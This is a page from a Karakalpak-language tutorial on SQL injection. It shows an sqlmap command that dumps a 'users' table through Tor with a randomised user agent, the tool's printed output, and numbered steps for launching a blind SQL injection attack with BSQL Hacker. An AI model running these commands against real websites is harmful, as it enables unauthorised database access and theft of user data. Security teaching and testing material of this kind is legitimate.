|
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor --dump -D testdb -T users --replicate
|
səhifə | 22/29 | tarix | 17.06.2023 | ölçüsü | 0,65 Mb. | | #131897 |
| Satbaeva
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor --dump -D testdb -T users --replicate
Skanerge paydalanıwshılar kestesi ushın baǵana atların anıqlaw hám olardan barlıq jazıwlardı shıǵarıp alıw qıyın bolmaydı:
[02:11:26] [INFO] fetching columns for table 'users' on database 'testdb'
[02:11:26] [INFO] fetching entries for table 'users' on database 'testdb'
Database: testdb
Table: users
[4 entries]
+----+--------+------------+
| id | name | surname |
+----+--------+------------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 1 | luther | blissett |
| 4 | NULL | nameisnull |
+----+--------+------------+
[02:11:27] [INFO] Table 'testdb.users' dumped to sqlite3 file
Sol tártipte biz SQLite formatında testdb.sqlite3 faylında maǵlıwmatlar bazası nusqasın alamız. Bul jaǵdayda biz SQLite múmkinshiliklerinen paydalanǵan halda (mısalı, SQLite Manager programmasınan) maǵlıwmatlardı kóriw menen sheklenip qalmastan, oǵan hár qanday sorawlardı orınlawımız múmkin.
BSQL Hacker
BSQL Hacker maǵlıwmatlar bazasınan maǵlıwmatlardı shıǵarıp alıwı ushın bir Qatar logıkalıq analiz qılıw usıllarınan paydalanadı.
BSQL Hacker – bul blind SQL den paydalanıw ushın mólsherlengen grafik quralı bolıp tabıladı. Bul programmalıq qural jańa apiwayı hámde ekspert paydalanıwshılar ushında arnalǵan. Hálsizlikti anıqlaw ushın onı eki avtomat hám avtomat bolmaǵan rejimlrtde isletiw múmkin
BSQL hacker programması interfeysi
SQL inekciyasıyanı ámelge asırıw basqıshları tómendegishe:
1. BSQL interfeysinde sazlaw bólimine ótiledi
2. Simvollar bóliminen belgilengen belgiler kiritiledi.
3. Keyin avtomatikalıq rejim saylanadı
4. Hújimdi ámelge asırıw ushin keying etapta maǵlıwmatlar bazası haqqńndaǵı flaglar alıp taslanadı.
5. Keyingi etapta Template-MySQL 5.0 + -Blind SQL Injection bólimi saylanadı.
6. Hújim baslaw múmkin, endi tek url adress kiritisek jetkilikli
Tómendegi url adress arqalı hújim ámelge asıramız
Dostları ilə paylaş: |
|
|